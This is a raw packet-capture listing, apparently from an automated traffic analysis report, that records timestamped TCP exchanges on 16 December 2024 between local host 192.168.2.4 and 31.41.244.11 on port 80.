                                                                                                                                                                                              Dec 16, 2024 01:01:25.051821947 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.051882029 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.051934958 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.052083969 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.052953005 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.053072929 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.053078890 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.053137064 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.054136038 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.054198980 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.054259062 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.054322958 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.055334091 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.055397034 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.055459976 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.055515051 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.056461096 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.056585073 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.056596041 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.056638002 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.057657957 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.057784081 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.057801962 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.057859898 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.058820963 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.058877945 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.058949947 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.059005022 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.059983969 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.060043097 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.060102940 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.060161114 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.061158895 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.061219931 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.061296940 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.061355114 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.062340021 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.062401056 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.062452078 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.062509060 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.063513994 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.063584089 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.063648939 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.063709974 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.064662933 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.064723015 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.064814091 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.064898014 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.065831900 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.065892935 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.065967083 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.066029072 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.067006111 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.067070961 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.067147970 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.067207098 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.068187952 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.068329096 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.068389893 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.069339037 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.069458008 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.069510937 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.069510937 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.070517063 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.070575953 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.070647001 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.070699930 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.071701050 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.071779013 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.071810961 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.071866989 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.072856903 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.072920084 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.072992086 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.073123932 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.074048996 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.074161053 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.074230909 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.075202942 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.075265884 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.075345993 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.075400114 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.076378107 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.076432943 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.076489925 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.076540947 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.077539921 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.077651024 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.077719927 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.078707933 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.078779936 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.078830004 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.078880072 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.079901934 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.080040932 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.080104113 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.081068039 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.081132889 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.081162930 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.083251953 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.092777014 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.092830896 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.092941999 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.093260050 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.093322039 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.093390942 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.094185114 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.094244003 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.094310045 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.094366074 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.095288992 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.095351934 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.216558933 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.216613054 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.216788054 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.216788054 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.217102051 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.217175007 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.217216015 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.217258930 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.217283964 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.218514919 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.218569994 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.218588114 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.218619108 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.219525099 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.219598055 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.219616890 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.219671965 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.220607042 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.220711946 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.220762014 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.221765041 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.221873045 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.221942902 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.222918034 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.223031044 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.223098040 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.224102974 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.224236012 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.224292040 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.225265026 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.225330114 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.225403070 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.225457907 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.226466894 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.226562023 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.226623058 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.227610111 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.227744102 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.227802992 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.228779078 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.228863955 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.228899002 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.228954077 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.229959011 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.230021954 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.230082989 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.230132103 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.231141090 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.231245041 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.231297970 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.232326031 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.232408047 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.232446909 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.232481003 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.233483076 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.233540058 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.233584881 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.233633041 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.234628916 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.234750986 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.234791994 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.234807014 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.235833883 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.235928059 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.235985041 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.236960888 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.237019062 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.237087965 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.237140894 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.238147974 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.238256931 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.238312960 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.239345074 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.239402056 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.239458084 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.239512920 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.240492105 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.240581036 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.240665913 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.240724087 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.241666079 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.241724014 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.241785049 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.241843939 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.242908001 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.243025064 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.243079901 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.244008064 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.244067907 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.244136095 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.244187117 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.245165110 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.245250940 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.245304108 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.245536089 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.246370077 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.246433020 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.246546030 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.246598005 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.247529030 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.247657061 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.247725010 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.248688936 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.248795033 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.248816013 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.248873949 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.249851942 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.249980927 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.250036955 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.251065969 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.251159906 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.251214981 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.251279116 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.252221107 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.252321959 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.252382994 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.253365040 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.253488064 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.253514051 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.253542900 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.254554033 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.254628897 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.254650116 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.254705906 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.255724907 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.255803108 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.255811930 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.255868912 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.256931067 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.257075071 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.257152081 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.258063078 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.258171082 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.258243084 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.259213924 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.259268999 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.259350061 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.259402037 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.260405064 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.260456085 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.260526896 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.260577917 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.261559010 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.261727095 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.261785030 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.262754917 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.262830973 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.262864113 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.262917995 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.263926029 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.264009953 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.264102936 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.264158964 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.265085936 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.265161991 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.265216112 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.265269995 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.266249895 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.266355991 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.266366959 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.266419888 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.267424107 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.267483950 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.267541885 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.267597914 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.268594027 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.268657923 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.268709898 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.268765926 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.269747019 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.269877911 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.269939899 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.270937920 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.271007061 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.271075964 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.271136999 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.272100925 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.272160053 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.272221088 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.272278070 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.273283005 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.273334980 CET804980031.41.244.11192.168.2.4
